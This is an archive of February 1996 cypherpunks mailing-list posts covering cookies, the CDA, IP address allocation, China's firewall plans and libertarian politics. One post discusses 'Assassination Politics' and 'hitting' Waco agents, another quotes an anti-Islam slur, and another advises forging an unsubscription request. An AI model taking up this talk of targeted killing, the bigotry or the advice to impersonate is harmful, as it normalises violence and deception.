Message-ID: <2.2.32.19960214024957.0076a27c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:32 PM 2/13/96 -0600, David E. Smith wrote:
>>I'm curious if anyone knows which sites use/modify it.
>AFAIK, the only site that uses it is *.netscape.com

That is not quite true.  There are other sites that use the cookies.  (It is
not very common though...)

One of the reasons that it was not used very much is that the first
implementation of cookies did not leave them after you exited Netscape.
There are a couple of server tools that utilize the cookie spec.  (I would
have to check the stack of sales stuff to verify which ones...)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Wed, 14 Feb 1996 17:29:18 +0800
To: cypherpunks@toad.com
Subject: Re: DEA
In-Reply-To: <199602130154.CAA23267@utopia.hacktic.nl>
Message-ID: <199602140310.TAA17328@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Column by Jim Dykes 
> in the Knoxville Journal (423-584-9606), 2/8/96.
> 
> 
> (...) I had a call the other day.  About the DEA.  Try to keep
> all these damn acronyms straight:  DEA is Drug Enforcement
> Agency.
> 
> Call was from an old cowboy - well, former Air America pilot, to
> be more precise, CIA.  (There should be a federal agency to
> control us old men better.)
> 
> To make a long, long story short, I have some names and phone
> numbers of people around the country - Customs, Immigration &
> Naturalization, maybe even some DEA, who can discuss rather
> interesting money ripoff techniques by DEA agents involving Title
> 18, Title 21, and Title 19 of the Federal Code.  There was a time
> when I would have busted a gut - and a phone budget - trying to
> snare some bent government agents.  But, now ...
> 
> Let me make it perfectly clear that this old persimmon really
> doesn't give a damn.  I am long past being shocked at venality
> and corruption in public servants.  But, if anybody wants to be a
> hotshot investigative reporter (and run up a helluva phone bill
> for his or her employer) just give me a call.  (That lets a lot
> of you out, since it would have to be somebody I know and trust.)

Someone with such information has one burning responsibility:
report all verifiable and relevent details to proper authorities.
Post your report to usenet to subject the object to public scrutiny.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 14 Feb 1996 17:51:31 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602140333.TAA07066@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:15 PM 2/13/96 -0500, Declan B. McCullagh wrote:
>Excerpts from internet.cypherpunks: 13-Feb-96 Re: V-chips, CC, and
>Motorc.. by Bill Frantz@netcom.com 
>> Adding money to the pot will attract rational (and amoral) people who will
>> then make a determination based on (1) profit, and (2) risk, which includes
>> getting caught or killed.  It seems to me that Secret Service levels of
>> protection can protect a public figure against even Assassination Politics.
>
>That may well be true, but speaking as someone who's worked on U.S.
>Presidential campaigns, that kind of protection is expensive,
>time-consuming, intrusive, and unlikely to be extended.

I assume that both Declan and Jim Bell agree that people high in the
government will be immune because they already enjoy this level of
protection (limitation one).  So the only people we can hit are the cannon
fodder, not the ones who gave the orders.  It has always been this way with
war.

If, after a couple of the Waco people had been hit, I was given the
responsibility to protect them I would proceed as follews:

(1) Gather them and their families onto some Army base and step up the
patrols.  Now I have them safe.

(2) Train and release them thru the witness protection program.  Cost
$20,000/person (if I remember the article John Young posted a pointer to
correctly.  (Thanks John))  This is probably about the same as the cost of
their training, so it makes economic sense.

(3) Make sure that the names/faces of the cannon fodder in future actions
are not available to make it harder to target the guilty.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Wed, 14 Feb 1996 17:08:49 +0800
To: postmaster@warehouse.mn.org (Postmaster)
Subject: Unknown address
Message-ID: <9602140048.AB19351@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi!  Could you tell me why I receive this message?!?

I *never* sent anything to your place...

What is it that is wrong? The cypherpunks remailer?  Your site? (how?)



========== original e-mail from you ================
>From warehouse.mn.org!postmaster@kksys.com Mon Feb 12 04:06:24 1996
Return-Path: <warehouse.mn.org!postmaster@kksys.com>
From: postmaster@warehouse.mn.org (Postmaster)
Subject: Unknown address
Date: Sun, 11 Feb 1996 22:19:49 GMT
Organization: The Warehouse BBS
To: jf_avon@citenet.net )

>The user this message was addressed to does not exist at this site.  Please
>verify the name and domain in the original message that follows.
>Message was addressed to: SAMUEL.KAPLIN@warehouse.mn.org
>
>                     ----- Original Message follows -----
>
>From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
>To: cypherpunks@toad.com
>Date: Sun, 11 Feb 1996 23:41:06 -0500
>Subject: Re: "Rights"
>
>Ed.Carp@linux.org, ecarp@netcom.com wrote:

<various blah blah from me snipped>

========= end original message from you ================
**** NEW PGP 2.6.2 KEY *********

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 14 Feb 1996 17:56:32 +0800
To: cypherpunks@toad.com
Subject: PING packets illegal?
Message-ID: <199602140355.TAA08824@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Concerning the ITAR ...... what would happen if some Evil Hacker Dude in,
say, England, decided to ICMP-ping a host in America? Nothing wrong with
that ...... but if those ping packets contained little pieces of something
like PGP ...... would the host being pinged be breaking the law? Would
all the hosts in the route between that host and the host in England that
was doing the ping also be breaking the law?

Curious,

Michael Ellis
<mellis@alpha.c2.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSE1owqs/Oe38tFJAQEiVgP+M10Cjf1mCq8L9uAfaxHV/hYpDUSJ5FMA
8j7nYyi4hH8heAak7l2AJXeSyqY1nMexBMoeZnUPbCRiZmrk7h9SSjywXIhV4ITH
y6z70NKhoz3p0d3kSeBiPiMuHuz1HAI/5hrECAqY9f+R0kYkK3GvVitb405Ly7kn
J0gbHi7pQOA=
=NcP+
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bruce@aracnet.com (Bruce Baugh)
Date: Wed, 14 Feb 1996 18:20:52 +0800
To: cypherpunks@toad.com
Subject: Bruce Reads The Calendar - cypherpunk gathering correction
Message-ID: <3120f361.34862023@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


It has been pointed out to me that the 26th is a Monday. Oops. The correct
date for the Portland cypherpunks get-together is in fact

Saturday, February 24, 1996

Thanks.


Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 14 Feb 1996 16:35:00 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [ADMIN] Unknown address
In-Reply-To: <9602140048.AB19351@cti02.citenet.net>
Message-ID: <199602140135.UAA16777@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois Avon writes:
> Hi!  Could you tell me why I receive this message?!?
[...]
> >The user this message was addressed to does not exist at this site.  Please
> >verify the name and domain in the original message that follows.
> >Message was addressed to: SAMUEL.KAPLIN@warehouse.mn.org

Sam Kaplin's account @warehouse.mn.org is apparently gone, but his address is
still apparently subscribed to cypherpunks. Some combination of the headers
placed on outgoing list mail by majordomo@toad, and the mail-return header
interpretation policy enforced by the mailer daemon @warehouse, is causing
list mail bounces to get routed to the original message sender. (Arguing over
which site is "at fault" should probably be done somewhere like the 
list-managers list, or much better still, between the sites themselves.)

A week or two ago I forwarded a bounce message to cypherpunks-owner@toad, and
my mail bounced. I asked Eric about it and he told me he hadn't been able to
get into that account for a while (he's the list manager :). Maybe that's been
rectified now. In lieu of that, the most expedient solution to these things
is usually a well-forged unsubscription request to majordomo@toad for the
bouncing address. I think Anonymous claimed to have taken care of that a
couple of days ago, but apparently they didn't succeed.

(Sam K. announced a while back that he would be effectively dropping off the
face of the net....)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 14 Feb 1996 16:57:14 +0800
To: stend@grendel.texas.net>
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <199602121313.IAA26828@UNiX.asb.com>
Message-ID: <0l8IS0K00YUvFgy1tJ@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 13-Feb-96 Re: Spin Control Alert (LI .. by Sten
Drescher@grendel.te 
>         As someone who would prolly be considered part of the
> 'religious right' (why don't we ever hear of the 'religious left', who
> are prolly just as much in support of banning porn?), I have to take
> exception to this.
> I'm appalled by the CDA, and, if you start
> pointing out to religious supporters of the CDA that it has already
> resulted in the King James version of the Bible being removed from (at
> least) one web site, I'm sure that some of them will be as well,

I do hope the religious right keeps fighting against GAK. However good
their intentions may be on *that* issue, it is transcendently obvious to
anyone who has been following the flux on Capitol Hill that they were
behind the recent push to regulate the Internet. (I assume your Bible
argument is just posturing. No U.S. Attorney, political appointees they,
ever will prosecute someone who puts the complete text of the King James
Bible online.)

So you are trivially correct in asserting that not everyone who
identifies as a member of the "religious right" supports all the actions
of their lobbyists in Washington. However, that does not change the fact
that conservative theocrats were the architects of the cyberporn scare
and the accompanying "indecency" legislation.

The selfsame theocrats, in fact, used Marty Rimm's cyberporn study and
the TIME cyberporn cover as a vehicle to promote their agenda. The very
conservative Sen. Chuck Grassley in July 1995 organized a hearing around
Rimm's study to justify his anti-smut legislation. "Not a study by an
advocacy group!" he crowed on the Senate floor.

Of course, he neglected to say that religious right lobbyists *helped
write* Rimm's study, and a member of his staff likely was involved.

Let's see who the players are, as identified by Mike Godwin:

 1) _The National Coalition for the Protection of Children and Families._
Formerly the National Coalition Against Pornography, this organization
renamed itself last year, perhaps in anticipation of its legislative
compaign against online "indecency" (a broader category than pornography).
 
 2) _The National Law Center for Children and Families._ This orgnization
was formerly headed by antiporn activist Cathy Cleaver -- it is now headed
by Bruce Taylor, formerly a prosecutor specializing in obscenity cases and
formerly the general counsel of a an antiporn group based in Phoenix,
Arizona, and founded under the name "Citizens for Decency through Law."
The organization was founded by Charles Keating, himself a veteran of the
Attorney General's Commission on Pornography (a.k.a. the Meese
Commission).
 
 3) _Enough is Enough!_  Presenting itself as a secular effort, this
organization provides a platform for former party girl and ex-No
Excuses-jeans model Donna Rice-Hughes, who has leveraged her fame from the
Gary Hart candidacy into a career as an antiporn activist. (With almost
suspiciously frequent meetings with Bob Dole.)

Enough is Enough is headed by Dee Jepsen, who testified about the
dangers of online nastiness at Grassley's cyberporn hearing. Bob
Chatelle from the Boston Coalition for Freedom of Expression reports
that Jepsen is Chairman of the Board of Regents of Pat Roberson's Regent
University, is Cochair of Washington For Jesus, and has served on the
Steering Committee of the Coalition on Revival, closely linked with the
Christian Reconstructionist movement. Reconstructionists believe that
Christians should "take dominion" and establish Old Testament law. Many
Reconstructionists openly advocate death for homosexuals, preferably by
stoning.

I'd be happy to expand on the links between the religious right and the
move to regulate the Net, but Mike Godwin has already done it quite
eloquently, at:
   http://www.cs.cmu.edu/~declan/rimm/

Some additional background about Donna Rice's censorship efforts,
including recent media profiles of her:
  http://fight-censorship.dementia.org/fight-censorship/dl?num=1178
  http://fight-censorship.dementia.org/fight-censorship/dl?num=302

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 14 Feb 1996 17:31:18 +0800
To: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Subject: Re: To find the clock speed of a sun workstation
In-Reply-To: <199602130016.AA10339@sunstorm.corp.cirrus.com>
Message-ID: <Pine.SV4.3.91.960213221303.6737A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Open up the box and look at the crystal.

Or, Attach a loop of wire to the probe of a frequency counter and move 
the probe around till you get a reading.

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 14 Feb 1996 18:07:32 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <ad4541d1000210045325@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960213221624.6737B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> Once again, the gutter religion of Islam reveals the derangement of its
> so-called Prophet.


    Get a grip, Tim. This is not the real you. I hope.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 14 Feb 1996 18:13:58 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: Re: your mail
In-Reply-To: <960212134104.2021ab25@hobbes.orl.mmc.com>
Message-ID: <Pine.SV4.3.91.960213222016.6737C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Corruption of blood isn't a musty, forgotten page of history. It lives on 
today in the form of the abuses of Civil Forfeiture that the War on Some 
Drugs has produced.  It got so bad that the US Supreme Court had to 
recently restrain the government. Although the Court chose to use the 
Double Jepeordy Clause to do their work.

Those Founding Fathers had some pretty good stuff. I'd like to see the 
revival of Letters of Marque

Those who don't study history are doomed to....

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 19:19:13 +0800
Subject: No Subject
Message-ID: <QQacwh26061.199602141059@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 12, 1996 23:23:59, 'ethridge@Onramp.NET (Allen B. Ethridge)' wrote: 
 
 
> 
>The Guardian Angels have decided to enter cyberspace and make it safe for 
>us all.  They have a FAQ on the web - http://www.safesurf.com/cyberangels/

>.  How is this relevant to cypherpunks?  From their FAQ: 
> 
> 
>"9) What kinds of changes would the Guardian Angels / CyberAngels like to
see? 
> 
>a) We would like to see an improvement in User identification. User ID is 
>impossible to verify or trace back. The very anonymity of Users is itself 
>causing an increase in rudeness, sexual abuse, flaming, and crimes like 
>pedophile activity. We the Net Users must take responsibility for the 
>problem ourselves. One of our demands is for more accountable User IDs on 
>the Net. When people are anonymous they are also free to be criminals. In
a 
>riot you see rioters wearing masks to disguise their true identity. The 
>same thing is happening online. We would like to see User ID much more 
>thoroughly checked by Internet Service Providers." 
> 
 
See: 
 
_Computer underground Digest_, "CyberAngels in Cyberspace," #8.04, 01/13/96

          (my original piece on the CyberAngels) 
_Computer underground Digest_, "CYBERANGELS," #8.06, 01/21/96 
          (the CyberAnels official response) 
_Computer underground Digest_.  [ENTIRE ISSUE]. #8.13, 02/06/96 
          (the readership responds) 
 
CuD is available as a Usenet newsgroup: comp.society.cu-digest 
 
Also, I have been corresponding with folks at _Wired_ who are picking up
the story, for their March issue I believe. 
 
On Feb 13, 1996 00:46:05, 'joseph@genome.wi.mit.edu (Joseph
Sokol-Margolis)' wrote: 
 
>not sure if this is the right place. 
>I agree with allen, about the issues of 'nym. But looking at other aspects

>of these cyberangels I'm unsure how to feel. On one hand they seem
resonable, 
>protecting only the children. ... 
 
The CyberAngels want to do *far* more than "protect only children." 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 19:13:00 +0800
Subject: No Subject
Message-ID: <QQacwi26178.199602141101@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


	IP addresses are a scarce resource today.  Try getting a /16
allocation (what used to be a class B).  There are politics in the
process already.

	Addresses will not be easily 'transferable.'  The IETF is
discussing a 'Best Current Practices' document that talks about
address portability.  Basically, it can't happen, because the routers
only have so much memory, and the routers at the core of the internet
can't keep in memory how to reach every one; there needs to be
aggregation.  The only feasible aggregation seems to be provider
based, ie, MCI, Alternet, and other large ISPs get blocks of
addresses.  They give them to smaller companies, like got.net, which
gives them to customers.  The result?  The core routers have a few
more years.

	Lastly, 32 bit addressing is going away.  IPv6 offers 128 bit
address space, and (hopefully) much more efficient allocation, as well
as such useful things as hooks for automatic renumbering of address space.

Adam


Alan Olsen wrote:
| >Markets for IP Addresses
| >
| >The 32-bit numbers used for Internet addressing and routing are a
| >limited resource. As this resource becomes scarcer, political
| >considerations are likely to creep into allocation decisions made
| >through existing administrative processes, leading to suboptimal
| >allocations. By granting transferable property rights to addresses,
| >allocation decisions can be removed from the political realm into the
| >economic realm, so that addresses are allocated to those who value them
| >most. This project seeks to develop consensus in the Internet community
| >for a move to market-based allocation, and investigates alternative
| >designs for an electronic market to coordinate the exchange of IP
| >addresses.
| 
| This proposal bothers me. I do not see any positive results from this
| proposal. (Or at least the negatives will far outweigh the positive.)
| 
| Here is what I see as the results of such a plan...
| 
| Getting an IP address will become prohibitivly expensive except for the
| largest megacorps.  Instead of solving the limitations of the current
| system, this plan will cause people to "invest" in IP addresses in the hope
| that the price will go up.  IP addresses will become part of a corporation's
| invenstment portfolio.  This will result in less usage of IP addresses, not


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 19:17:05 +0800
Subject: No Subject
Message-ID: <QQacwi26616.199602141107@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, sunder@dorsai.dorsai.org writes:

>
> On Mon, 12 Feb 1996, Mark Allyn (206) 860-9454 wrote:
>
>> What do you mean by a speech bubble?
>> 
>> "write in a speech bubble to the president dude"
>> 
>> Does this mean a transparent plastic bubble over his head??
>
> Like in comic books.  i.e:

I got a dollar bill yesterday with a rubber-stamped speech baloon saying
"I Grew Hemp" next to George's head.  First one I'd seen, so the
transmission layer isn't too crowded.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSFXjxvikii9febJAQHaDAP9HQ/Iqw0CLNmSEBXcduwK9Wa0WaY6N026
bYU9fpvKMd16JBuRQ7wvQ6/l9QUwY9KF6J/LEnrbKC3bdEl3E09kqCg0VyL0QJYq
4y8b4QqvfzIt/yecOSVRyo4v3pCZXKeqaHvWq8wJnnYanzpMUXHGLmBL6FohJzi+
SvoHC5qlp9M=
=S05W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 23:46:51 +0800
Subject: No Subject
Message-ID: <QQacwj27339.199602141115@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> 
> From:	IN%"tallpaul@pipeline.com" 12-FEB-1996 00:47:35.36
> 
> >But I do not dismiss people as "lib'bers;" I merely call them that. I have
> >noticed that a large number of libertarians are fans of Rush Limbaugh and
> >chuckle a lot when Rush refers to women like Andrea Dworkin and her
> >supporters as lib'bers. I also find that the people opposed to Drowkin &
> >Co. are upset at her use of demagogic language, private dictionaries, and
> >the like. So am I, and started long before Rush got his TV shows. I am,
> >however, equally (if not more upset) by what I perceive as similar
> >demagogic etc. behavior by many libertarians. 
> 
> 	Large number of libertarians are fans of Rush Limbaugh? The last time
> I checked, Rush Limbaugh was basically a conservative populist like Pat
> Buchanan. While we may appreciate his comments re Andrea Dworkin (and others
> who want to restrict free speech on ridiculous grounds, and who believe
> nonsensical things like an inability to consent to sex), that doesn't mean
> we're fans of his. I like some of what Jefferson said, too, but that doesn't
> mean I agree with him on slave-holding (or on agrarianism).

Neither Rush Limbaugh or Pat Buchanan are populists.  Populists tend to
believe in strong government with strict regulation of business, an
actually progressive tax system, confiscation of businesses which break
the rules, government enterprise in competition with the private sector,
no secrecy in government of the type required in the private sector,
bias toward small businesses and sole proprietors, etc.
Letting business "do whatever they want", really doesn't qualify.
FWIU, Buchanan's only claim is opposition to "free trade"(forcing the US
to trade)

AFWIU, Jefferson didn't like slavery, and later freed his slaves,
but considered it necessary for business when he practiced it.
Have you worked at a job you didn't approve of?

> >Do they really have a right not to be styled "lib'bers?" No, I do not think
> >they have that right. 
> 
> 	Call us whatever you like. My problem with the term is that it's
> confusing. I doubt, for instance, that Rush Limbaugh is using it as an
> abbreviation for libertarian, although I'm not sure for what, if anything,
> it's a contraction.
> 
> >I do not believe that all lib'bers are in league with the Christian right;
> >I am distrubed, however, by the large numbers of lib'bers who strangely
> >never mention the existence of the fundamentalists in the
> >ultra-conservative ultra-private-property camp. 
> 
> 	Yes, the fundys are in there. Politics makes strange bedfellows; work
> with whoever you can on whatever you can agree on. It's sort of like both our
> and CPSR's opposition to the CDA - CPSR has entirely too many desires to
> regulate private property (free net access et al), but we can still work with
> them on what we agree on.
> 
> >I am equally concerned with some leftists who consider every example of
> >authoritarian behavior as "fascism" as I am with 'ib'bers who lump everyone
> >who argues for social responsibility as a "socialst statist." One
> >difference I see is that I am willing to criticize both groups while many
> >(but not all) lib'bers are again strangely silent at least the "statist"
> >side of the equation. 
>  
> 	Well, about 25% or so of libertarians are anarcho-capitalists, so far
> as I can tell. So of course they're going to find anyone who's advocating state
> control a "statist." They've agreed to disagree with people like me who aren't
> anarchists, but that's because we've got most other things in common.  
> 	-Allen
> 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 19:29:47 +0800
Subject: No Subject
Message-ID: <QQacwj27839.199602141121@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


}Is ok. I suspect that we are narrowing on a similar position. Would like
}to see a time when net communications make "representatives of the people"
}obsolete" since majority voting on any issue can be "anytime,anywhere".
}Doubt that it will happen soon.

<rm>

I too would like to see a purely democratic process rather than a
representative one.  And I also agree that it won't happen soon.  The
question is, what do we keep of govt?

How would the group propose electronic voting on legislation should
proceed?  What sort of technical solution could be arrived at to allow
everyone in the country to vote on specific legislation and how would they
get access to that legislation?  I think _this_ is a cypherpunk topic for
sure.

}Take CDA (please) - obviously draconian and unconstitutional. Think how
}much more difficult it would be to overturn if worded more reasonably.
}Then ask if that was intentional 8*).

I have to believe that Exon truly meant to castrate the net, but in his own
zealous wording, made it easier to turn the law over.  I think it is
reasonable to hope that that will be the effect.  Our doing our part to
make enough noise about it will only help our cause.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 19:42:14 +0800
Subject: No Subject
Message-ID: <QQacwj28452.199602141129@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Tue, 13 Feb 1996 22:28-0500
From: The White House <Publications-Admin@WhiteHouse.Gov>
To: Public-Distribution@CLINTON.AI.MIT.EDU
Subject: 1996-02-13 VP Gore Unveils On-Line Service for Businesses

 

                            THE WHITE HOUSE

                      Office of the Vice President

________________________________________________________________________
For Immediate Release                                  February 13, 1996


   VICE PRESIDENT UNVEILS NEWEST ON-LINE SERVICE FOR U.S. BUSINESSES
  Gore Says U.S. Business Advisor Key To Governing In Information Age


    Vice President Gore today (2/13) unveiled the a new and improved
"customer-designed" version of the U.S. Business Advisor.  The
"Advisor", which was first presented at the 1995 White House
Conference on Small Business, underwent a six-month redesign that
addressed the specific needs of the business community.  The improved
"Advisor" will provide users with one-stop electronic access to more
than 60 different federal organizations that assist or regulate
businesses.

	This on-line service, which directly links American businesses
with the federal government, was originally developed by the Vice
President's National Performance Review in cooperation with federal
agencies and the business community.

	Today, at the annual convention of the Armed Forces
Communications and Electronics Association (AFCEA) in Tyson's Corner,
VA, the Vice President officially placed the new Advisor on the World
Wide Web (http://www.business.gov).

	"By employing state-of-the-art information technology, the
Advisor is improving communication between American businesses and
their government," the Vice President said.  "Because this version was
developed with the support of the business community, the Advisor
serves our customers on their terms.  Both Fortune 500 companies and
start-up businesses will benefit from this improved service."

	The Advisor provides an interactive environment where
businesses can:  file documents electronically with the government;
retrieve documents, applications and other information; get answers to
commonly asked questions; obtain names and contact numbers of business
agencies; acquire news on specific business topics; and send feedback.

	The improved version of the U.S. Business Advisor was unveiled
today as the Vice President delivered the second of three speeches on
technology and the future of America.  The "Technology Trilogy" began
Monday (2/12), in Baltimore, MD, where the Vice President spoke to the
American Association for the Advancement of Science.  The final speech
is scheduled for tomorrow (2/14), in Philadelphia, PA, where the Vice
President will visit the first programmable computer, also known as the
ENIAC.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 19:42:36 +0800
Subject: No Subject
Message-ID: <QQacwk28806.199602141134@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 09:22 PM 2/13/96 -0500, Declan B. McCullagh wrote:
>I do hope the religious right keeps fighting against GAK. However good
>their intentions may be on *that* issue, it is transcendently obvious to
>anyone who has been following the flux on Capitol Hill that they were
>behind the recent push to regulate the Internet.

Not obvious to me.

While the religious right clearly supported the push to regulate the
internet, the main push seemed to me to come from the existing mass
media, primarily the three big TV channels.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 19:50:07 +0800
Subject: No Subject
Message-ID: <QQacwk28838.199602141134@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> This would hose 93% of the subversive stuff on the 'net.

I guess I've gotten turned around on this -- last week I was arguing your 
position.

But:  China's problem is internal, not external, and it's political, not 
sexual.  Let's assume that they can build a successful firewall -- 
despite the fact that the people here on this list who design and install 
such firewalls for a living don't believe that the Chineese plan is 
feasible.  Let's assume that they can prevent people from grabbing photos 
from playboy.com.  So what?

Who's in a position to formulate devastating criticisms of China's
government?  Americans?  Or people who live under the system and
understand it?  And what's subversive, anyway?  Breasts enhanced with
silicon and airbrushing, or plain honest talk about liberty and
government? 

Any net that lets the Chineese people publish and talk to one another is 
going to create problems for the government.

On top of that, the firewall isn't even going to keep out foreign traffic. 
The firewall model doesn't work for internal security -- it assumes that
the people on the inside are trustworthy, and it focuses on protecting the
internal net from people on the outside.  The Chineese have to deal with 
people on the inside trying to subvert the wall by building illicit links 
via telephone lines or satellite channels.

Let's put it another way.  Suppose a company has a strong firewall 
installed by a first rate security consultant.  If an employee who has 
access to the internal net puts a modem on his machine and lets anyone 
who wants to dial in and connect to the internal net, what good does the 
firewall do?  You can't come in over the Internet, but you can come in 
over a pots line.  Either way, you've got your access.

For what it's worth, I have a friend who just got a job with Apple's
operation in China.  According to him, Hong Kong is fully wired, but
mainland China only has about 5,000 net accounts outside of government or
acadamia.  All 5,000 of those accounts seem to be served by a single 64kbs
connection to the outside world, which suggests that they're email only.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 19:47:59 +0800
Subject: No Subject
Message-ID: <QQacwk29023.199602141137@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 07:36 PM 2/13/96 -0800, Bill Frantz wrote:
>At  8:15 PM 2/13/96 -0500, Declan B. McCullagh wrote:

>>That may well be true, but speaking as someone who's worked on U.S.
